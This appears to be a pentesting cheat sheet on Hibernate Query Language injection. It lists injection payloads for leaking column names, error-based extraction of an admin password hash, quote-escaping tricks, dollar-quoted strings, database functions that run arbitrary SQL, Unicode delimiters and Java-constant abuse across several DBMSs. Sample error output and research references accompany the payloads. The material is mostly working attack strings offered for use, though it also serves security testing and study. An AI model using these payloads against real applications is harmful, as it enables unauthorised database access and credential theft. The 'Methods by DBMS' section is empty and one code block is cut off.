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# Hibernate Query Language Injection
> Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia
## Summary
* [HQL Comments](#hql-comments)
* [HQL List Columns](#hql-list-columns)
* [HQL Error Based](#hql-error-based)
* [Single Quote Escaping](#single-quote-escaping)
* [$-quoted strings](#--quoted-strings)
* [DBMS Magic functions](#dbms-magic-functions)
* [Unicode](#unicode)
* [Java constants](#java-constants)
* [Methods by DBMS](#methods-by-dbms)
* [References](#references)
:warning: Your input will always be between the percentage symbols: `%INJECT_HERE%`
## HQL Comments
HQL does not support comments
## HQL List Columns
from BlogPosts
where title like '%'
and DOESNT_EXIST=1 and ''='%' --
and published = true
Using an unexisting column will an exception leaking several columns names.
org.hibernate.exception.SQLGrammarException: Column "DOESNT_EXIST" not found; SQL statement:
select blogposts0_.id as id21_, blogposts0_.author as author21_, blogposts0_.promoCode as promo3_21_, blogposts0_.title as title21_, blogposts0_.published as published21_ from BlogPosts blogposts0_ where blogposts0_.title like '%' or DOESNT_EXIST='%' and blogposts0_.published=1 [42122-159]
## HQL Error Based
from BlogPosts
where title like '%11'
and (select password from User where username='admin')=1
or ''='%'
and published = true
Error based on value casting.
Data conversion error converting "d41d8cd98f00b204e9800998ecf8427e"; SQL statement:
select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.promotionCode as promotio3_18_, blogposts0_.title as title18_, blogposts0_.visible as visible18_ from BlogPosts blogposts0_ where blogposts0_.title like '%11' and (select user1_.password from User user1_ where user1_.username = 'admin')=1 or ''='%' and blogposts0_.published=1
:warning: **HQL does not support UNION queries**
## Single Quote Escaping
Method works for MySQL DBMS which escapes SINGLE QUOTES in strings with SLASH `\'`.
In HQL SINGLE QUOTES is escaped in strings by doubling `''`.
'abc\''or 1=(select 1)--'
In HQL it is a string, in MySQL it is a string and additional SQL expression.
## $-quoted strings
Method works for DBMS which allow DOLLAR-QUOTED strings in SQL expressions: PostgreSQL, H2.
Hibernate ORM allows identifiers starting with `$$`.
$$='$$=concat(chr(61),chr(39)) and 1=1--'
## DBMS Magic functions
Method works for DBMS which have MAGIC FUNCTIONS which evaluate SQL expression in string parameter: PostgreSQL, Oracle.
Hibernate allows to specify any function name in HQL expression.
PostgreSQL has built-in function `query_to_xml('Arbitrary SQL')`.
array_upper(xpath('row',query_to_xml('select 1 where 1337>1', true, false,'')),1)
Oracle has built-in function `DBMS_XMLGEN.getxml('SQL')`
NVL(TO_CHAR(DBMS_XMLGEN.getxml('select 1 where 1337>1')),'1')!='1'
## Unicode
Method works for DBMS which allow UNICODE delimiters (Ex. U+00A0) between SQL tokens: Microsoft SQL Server, H2.
In Microsoft SQL SERVER `SELECT LEN([U+00A0](select[U+00A0](1))` works the same as `SELECT LEN((SELECT(1)))`;
HQL allows UNICODE symbols in identifiers (function or parameter names).
SELECT p FROM hqli.persistent.Post p where p.name='dummy' or 1<LEN( (select top 1 name from users)) or '1'='11'
## Java constants
Method works for most DBMS (does not work for MySQL).
Hibernate resolves Java public static fields (Java constants) in HQL queries:
- Class with Java constant must be in classpath
- Ex. `java.lang.Character.SIZE` is resolved to 16
- String or char constants are additionally surrounded by single quotes
To use JAVA CONSTANTS method we need special char or string fields declared in classes or interfaces on classpath.
public class Constants {
public static final String S_QUOTE = "'";
public static final String HQL_PART = "select * from Post where name = '";
public static final char C_QUOTE_1 = '\'';
public static final char C_QUOTE_2 = '\047';
public static final char C_QUOTE_3 = 39;
public static final char C_QUOTE_4 = 0x27;
public static final char C_QUOTE_5 = 047;
Some usable constants in well-known Java libraries:
org.apache.batik.util.XMLConstants.XML_CHAR_APOS [ Apache Batik ]
com.ibm.icu.impl.PatternTokenizer.SINGLE_QUOTE [ ICU4J ]
jodd.util.StringPool.SINGLE_QUOTE [ Jodd ]
ch.qos.logback.core.CoreConstants.SINGLE_QUOTE_CHAR [ Logback ]
cz.vutbr.web.csskit.OutputUtil.STRING_OPENING [ jStyleParser ]
com.sun.java.help.impl.DocPConst.QUOTE [ JavaHelp ]
org.eclipse.help.internal.webapp.utils.JSonHelper.QUOTE [ EclipseHelp ]
dummy' and hqli.persistent.Constants.C_QUOTE_1*X('<>CHAR(41) and (select count(1) from sysibm.sysdummy1)>0 --')=1 and '1'='1
## Methods by DBMS

## References
* [HQL for pentesters - February 12, 2014 - Philippe Arteau](https://blog.h3xstream.com/2014/02/hql-for-pentesters.html)
* [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language)
* [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf)
* [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm)
* [New Methods for Exploiting ORM Injections in Java Applications - HITBSecConf2016 - Mikhail Egorov - Sergey Soldatov](https://conference.hitb.org/hitbsecconf2016ams/materials/D2T2%20-%20Mikhail%20Egorov%20and%20Sergey%20Soldatov%20-%20New%20Methods%20for%20Exploiting%20ORM%20Injections%20in%20Java%20Applications.pdf)
* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/)